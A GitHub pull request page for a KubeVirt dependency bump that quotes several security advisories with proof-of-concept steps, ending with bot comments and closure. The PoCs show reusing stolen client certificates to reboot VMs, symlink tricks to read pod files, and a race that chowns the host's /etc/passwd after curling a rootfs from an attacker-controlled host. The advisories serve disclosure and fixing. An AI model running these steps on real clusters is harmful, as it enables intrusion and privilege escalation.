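		// Verify the chain against the kubevirt-ca bundle held in certPool.
		if _, err := cert.Verify(x509.VerifyOptions{
			Roots:     certPool,
			KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
		}); err != nil {
			return err
		}
		if cert.Subject.CommonName != expectedCN {
			return fmt.Errorf("unexpected client CN %q, want %q",
				cert.Subject.CommonName, expectedCN)
		}
		return nil
	}
}

func main() {
	pool := x509.NewCertPool() // would hold the kubevirt-ca bundle in practice
	cfg := &tls.Config{
		ClientAuth:            tls.RequireAnyClientCert,
		VerifyPeerCertificate: verifyExpectedCN(pool, "kubevirt.io:system:client:virt-handler-migration"),
	}
	_ = cfg
	fmt.Println("migration listener configured with a role-specific client CN")
}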

PoC

To illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (minikube and minikube-m02) and therefore two virt-handler instances, alongside a VMI running on one of the nodes. It is assumed that an attacker has obtained the client certificate bundle used by the virt-handler instance running on the compromised node (minikube), while the virtual machine is running on the other node (minikube-m02). They can thus interact with the sub-resource API exposed by the other virt-handler instance and control the lifecycle of the VMs running on that node:

##### the deployed VMI on the non-compromised node minikube-m02
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
    kubevirt.io/size: small
  name: mishandling-common-name-in-certificate-handler
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=
##### the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3
attacker@minikube:~$ curl -k https://10.244.1.3:8186/
curl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0

##### get the certificate bundle directory and redo the request
attacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter 'Name=virt-handler' --format='{{.ID}}' | head -n 1) | grep "clientcertificates:ro" | cut -d ':' -f1 | tr -d '"[:space:]')

attacker@minikube:~$ curl -k  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/
404: Page Not Found

##### soft reboot the VMI instance running on the other node
attacker@minikube:~$ curl -ki  --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key  https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot  -XPUT
HTTP/1.1 202 Accepted

##### the VMI mishandling-common-name-in-certificate-handler has been rebooted
Impact

Due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances, potentially compromising the integrity and availability of the VMs they manage.

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).



KubeVirt Arbitrary Container File Read

CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109

More information

Details

Summary

Mounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the virt-launcher pod. This is due to erroneous handling of symlinks defined within a PVC.

Details

A vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod's file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod's file system. Since libvirt can treat regular files as block devices, any file on the pod's file system that is symlinked in this way can be mounted into the VM and subsequently read.

Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (the isolation-detection flaw tracked as CVE-2025-64437, described later in this update). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod's file system or on a mounted PVC from within the guest VM.
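
A minimal sketch of the kind of check that prevents this class of traversal, assuming the PVC mount root is known (this is not the patched KubeVirt code): refuse a disk.img that is a symlink, and verify that its resolved path stays under the mount root.

// Sketch: reject disk.img candidates that are symlinks or that resolve
// outside the PVC mount root. Paths are illustrative.
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// safeDiskImage returns the resolved path of diskImg if it is not a symlink
// and is located under mountRoot, and an error otherwise.
func safeDiskImage(mountRoot, diskImg string) (string, error) {
	fi, err := os.Lstat(diskImg) // Lstat does not follow symlinks
	if err != nil {
		return "", err
	}
	if fi.Mode()&os.ModeSymlink != 0 {
		return "", fmt.Errorf("%s is a symlink, refusing to use it", diskImg)
	}
	resolved, err := filepath.EvalSymlinks(diskImg) // also catches symlinked parent dirs
	if err != nil {
		return "", err
	}
	root, err := filepath.EvalSymlinks(mountRoot)
	if err != nil {
		return "", err
	}
	if resolved != root && !strings.HasPrefix(resolved, root+string(os.PathSeparator)) {
		return "", fmt.Errorf("%s resolves outside %s", diskImg, mountRoot)
	}
	return resolved, nil
}

func main() {
	// Hypothetical paths mirroring the PoC layout.
	p, err := safeDiskImage("/var/run/kubevirt-private/vmi-disks/pvc-1",
		"/var/run/kubevirt-private/vmi-disks/pvc-1/disk.img")
	fmt.Println(p, err)
}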

PoC

Consider that an attacker has control over the contents of two PVCs (e.g., from within a container) and creates the following symlinks:

##### The YAML definition of two PVCs that the attacker has access to
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-1
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-2
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---

##### The attacker-controlled container used to create the symlinks in the above PVCs
apiVersion: v1
kind: Pod
metadata:
  name: dual-pvc-pod
spec:
  containers:
  - name: app-container
    image: alpine
    command: ["/some-vulnerable-app"]
    volumeMounts:
    - name: pvc-volume-one
      mountPath: /mnt/data1
    - name: pvc-volume-two
      mountPath: /mnt/data2
  volumes:
  - name: pvc-volume-one
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-1
  - name: pvc-volume-two
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-2

By default, Minikube's storage controller (hostpath-provisioner) will allocate the claim as a directory on the host node (HostPath). Once the above Kubernetes resources are created, the user can create the symlinks within the PVC as follows:

##### Using the `pvc-arbitrary-container-read-1` PVC we want to read the default XML configuration generated by `virt-launcher` for `libvirt`. Hence, the attacker has to create a symlink including the name of the future VM which will be created using this configuration.

attacker@dual-pvc-pod:/mnt/data1 $ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img
attacker@dual-pvc-pod:/mnt/data1 $ls -l
lrwxrwxrwx    1 root     root            85 May 19 22:24 disk.img -> ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml

##### With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM
attacker@dual-pvc-pod:/mnt/data2 $ln -s ../../../../../../../../etc/passwd disk.img 
attacker@dual-pvc-pod:/mnt/data2 $ls -l
lrwxrwxrwx    1 root     root            34 May 19 22:26 disk.img -> ../../../../../../../../etc/passwd

Of course, these links could be broken, as the target files, especially default_arbitrary-container-read.xml, may not exist on the dual-pvc-pod pod's file system. The attacker then deploys the following VM:

##### arbitrary-container-read.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-container-read
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-container-read
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: pvc-1
              disk:
                bus: virtio
            - name: pvc-2
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: pvc-1
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-1
        - name: pvc-2
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-2
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The two PVCs will be mounted as volumes in "filesystem" mode.

From the documentation of the different volume modes, one can infer that if the backing disk.img is not owned by the unprivileged user with UID 107, the VM should fail to mount it. In addition, this backing file is expected to be in RAW format. While this format can contain pretty much anything, we consider that being able to mount a file from the file system of virt-launcher is not the expected behaviour. Below it is demonstrated that, after applying the VM manifest, the guest can read the /etc/passwd and default_arbitrary-container-read.xml files from the virt-launcher pod's file system:

##### Deploy the VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml
virtualmachine.kubevirt.io/arbitrary-container-read created

##### Observe the deployment status
operator@minikube:~$ kubectl get vmis
NAME                       AGE   PHASE     IP           NODENAME       READY
arbitrary-container-read   80s   Running   10.244.1.9   minikube-m02   True

##### Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-container-read
##### Within the `arbitrary-container-read` VM, inspect the available block devices
root@arbitrary-container-read:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
`-vda15 253:15   0    8M  0 part
vdb     253:16   0   20K  0 disk
vdc     253:32   0  512B  0 disk
vdd     253:48   0    1M  0 disk

##### Inspect the mounted /etc/passwd of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdc
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash

##### Inspect the mounted `default_arbitrary-container-read.xml` of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdb | head -n 20
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit default_arbitrary-container-read
or other application using the libvirt API.
-->
<domstatus state='paused' reason='starting up' pid='80'>
  <monitor path='/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock' type='unix'/>
  <vcpus>
  </vcpus>
  <qemuCaps>
    <flag name='hda-duplex'/>
    <flag name='piix3-usb-uhci'/>
    <flag name='piix4-usb-uhci'/>
    <flag name='usb-ehci'/>
    <flag name='ich9-usb-ehci1'/>
    <flag name='usb-redir'/>
    <flag name='usb-hub'/>
    <flag name='ich9-ahci'/>
operator@minikube:~$ kubectl get pods
NAME                                           READY   STATUS    RESTARTS   AGE
dual-pvc-pod                                   1/1     Running   0          20m
virt-launcher-arbitrary-container-read-tn4mb   3/3     Running   0          15m

##### Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash 

##### Inspect the ownership of the `/etc/passwd` file of the ` virt-launcher` pod 
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd
-rw-r--r--. 1 qemu qemu 73 Jan  1  1970 /etc/passwd
Impact

This vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

CVE-2025-64432 / GHSA-38jw-g2qx-4286 / GO-2025-4103

More information

Details

KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes

CVE-2025-64437 / GHSA-2r4r-5x78-mvqf / GO-2025-4102

More information

Details

Summary

It is possible to trick the virt-handler component into changing the ownership of arbitrary files on the host node to the unprivileged user with UID 107 due to mishandling of symlinks when determining the root mount of a virt-launcher pod.

Details

In the current implementation, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher), thus compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.
To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod.
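
The missing check is straightforward to express. A hedged sketch (not the upstream fix) that refuses a launcher-sock which is a symlink or which is not actually a unix socket:

// Sketch: validate the launcher socket before using it for isolation
// detection. The path mirrors the one referenced in the PoC.
package main

import (
	"fmt"
	"os"
)

func validateLauncherSock(path string) error {
	fi, err := os.Lstat(path) // Lstat does not follow symlinks
	if err != nil {
		return err
	}
	if fi.Mode()&os.ModeSymlink != 0 {
		return fmt.Errorf("%s is a symlink, refusing isolation detection", path)
	}
	if fi.Mode()&os.ModeSocket == 0 {
		return fmt.Errorf("%s is not a unix socket", path)
	}
	return nil
}

func main() {
	err := validateLauncherSock("/var/run/kubevirt/sockets/launcher-sock")
	fmt.Println(err)
}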

PoC

In this demonstration, two additional vulnerabilities are combined with the primary issue to arbitrarily change the ownership of a file located on the host node:

  1. A symbolic link (launcher-sock) is used to manipulate the interpretation of the root mount within the affected container, effectively bypassing expected isolation boundaries.
  2. Another symbolic link (disk.img) is employed to alter the perceived location of data within a PVC, redirecting it to a file owned by root on the host filesystem.
  3. As a result, the ownership of an existing host file owned by root is changed to a less privileged user with UID 107.

It is assumed that an attacker has access to a virt-launcher pod's file system (for example, obtained using another vulnerability) and also has access to the host file system with the privileges of the qemu user (UID=107). It is also assumed that they can create unprivileged user namespaces:

admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1

The steps below are inspired by an article in which the attacker constructs an isolated environment solely from Linux namespaces and an augmented Alpine container root file system.

##### Download a container file system from an attacker-controlled location
qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar

##### Create a directory and extract the file system in it
qemu-compromised@minikube:~$  mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine

##### Create a MOUNT and remapped USER namespace environment and execute a shell process in it
qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh

##### Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.
##### The user is root in its new USER namespace
root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root

##### Swap the current root of the process and store the old one within a directory
root@minikube:~$ pivot_root . hostfs_root 
root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin

##### Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount
root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \
mkdir -p "${PVC_PATH}" && \
cd "${PVC_PATH}"

##### Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory
root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img

##### Create the socket which will confuse the isolation detector and start listening on it
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -

After the environment is set, the launcher-sock in the virt-launcher container should be replaced with a symlink to ../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509 is the PID of the above isolated shell process). This should be done, however, at the right moment. For this demonstration, it was decided to trigger the bug by leveraging a race condition when creating or updating a VMI:

//pkg/virt-handler/vm.go

func (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {
  // ...
  //!!! MK: the change should happen here before executing the below line !!!
  isolationRes, err := c.podIsolationDetector.Detect(vmi)
		if err != nil {
			return fmt.Errorf(failedDetectIsolationFmt, err)
		}
		virtLauncherRootMount, err := isolationRes.MountRoot()
		if err != nil {
			return err
		}
		// ...

		// initialize disks images for empty PVC
		hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
		// MK: here the permissions are changed
		err = hostDiskCreator.Create(vmi)
		if err != nil {
			return fmt.Errorf("preparing host-disks failed: %v", err)
		}
    // ...

The manifest of the VMI which is going to trigger the bug is:

##### The PVC will be used for the `disk.img` related bug
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: corrupted-pvc
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 500Mi
---
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: launcher-symlink-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: corrupted-pvc
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: corrupted-pvc
    persistentVolumeClaim:
      claimName: corrupted-pvc
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

Just before the c.podIsolationDetector.Detect(vmi) line is executed, the attacker should replace the launcher-sock with a symlink to the bad.sock controlled by the isolated process:

##### the namespaced process controlled by the attacker has pid=2245509
qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') &&  ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

Upon successful exploitation, virt-handler connects to the attacker-controlled socket, misinterprets the root mount, and changes the ownership of the host's /etc/passwd file:

##### `virt-handler` connects successfully
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
...
2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "<anon>" on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010
2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio
2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]
PRI * HTTP/2.0
a

@redhat-renovate-bot redhat-renovate-bot added the release-note-none Denotes a PR that doesn't merit a release note. label Dec 4, 2025
@redhat-renovate-bot
Collaborator Author

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: go.sum
Command failed: go get -t ./...
go: downloading github.com/onsi/ginkgo/v2 v2.22.1
go: downloading github.com/onsi/gomega v1.36.2
go: downloading golang.org/x/net v0.38.0
go: downloading golang.org/x/sync v0.12.0
go: downloading golang.org/x/text v0.23.0
go: downloading golang.org/x/term v0.30.0
go: downloading golang.org/x/oauth2 v0.27.0
go: downloading golang.org/x/time v0.9.0
go: downloading google.golang.org/protobuf v1.36.5
go: downloading golang.org/x/sys v0.31.0
go: downloading github.com/google/cel-go v0.23.2
go: downloading golang.org/x/crypto v0.36.0
go: downloading cel.dev/expr v0.19.1
go: downloading google.golang.org/genproto/googleapis/api v0.0.0-20241209162323-e6fa225c2576
go: downloading google.golang.org/grpc v1.68.1
go: downloading google.golang.org/genproto/googleapis/rpc v0.0.0-20241209162323-e6fa225c2576
go: downloading golang.org/x/tools v0.28.0
go: downloading github.com/google/pprof v0.0.0-20241210010833-40e02aabc2ad
go: downloading github.com/grpc-ecosystem/grpc-gateway/v2 v2.24.0
go: downloading k8s.io/api v0.34.2
go: github.com/kubevirt/kubevirt-tekton-tasks/cmd/disk-uploader imports
	k8s.io/client-go/kubernetes imports
	k8s.io/client-go/kubernetes/typed/coordination/v1alpha1 imports
	k8s.io/api/coordination/v1alpha1: cannot find module providing package k8s.io/api/coordination/v1alpha1
go: github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate tested by
	github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate.test imports
	kubevirt.io/client-go/kubevirt/fake imports
	kubevirt.io/api/instancetype/v1alpha1: cannot find module providing package kubevirt.io/api/instancetype/v1alpha1
go: github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate tested by
	github.com/kubevirt/kubevirt-tekton-tasks/modules/disk-uploader/pkg/certificate.test imports
	kubevirt.io/client-go/kubevirt/fake imports
	kubevirt.io/api/instancetype/v1alpha2: cannot find module providing package kubevirt.io/api/instancetype/v1alpha2

@kubevirt-bot kubevirt-bot added the dco-signoff: yes Indicates the PR's author has DCO signed all their commits. label Dec 4, 2025
@kubevirt-bot
Contributor

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@openshift-ci openshift-ci bot requested a review from geetikakay December 4, 2025 15:27
@openshift-ci

openshift-ci bot commented Dec 4, 2025

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: redhat-renovate-bot
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@openshift-ci

openshift-ci bot commented Dec 4, 2025

@redhat-renovate-bot: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name Commit Details Required Rerun command
ci/prow/images 86acc10 link true /test images
ci/prow/e2e-tests 86acc10 link true /test e2e-tests

Full PR test history. Your PR dashboard.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

@ksimon1
Member

ksimon1 commented Dec 5, 2025

/close
we can't merge this, because it requires newer Golang, than we can use.

@kubevirt-bot
Contributor

@ksimon1: Closed this PR.

In response to this:

/close
we can't merge this, because it requires newer Golang, than we can use.

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository.

@redhat-renovate-bot
Collaborator Author

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update (v1.7.0). You will get a PR once a newer version is released. To ignore this dependency forever, add it to the ignoreDeps array of your Renovate config.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.

@redhat-renovate-bot redhat-renovate-bot deleted the renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability branch December 6, 2025 07:18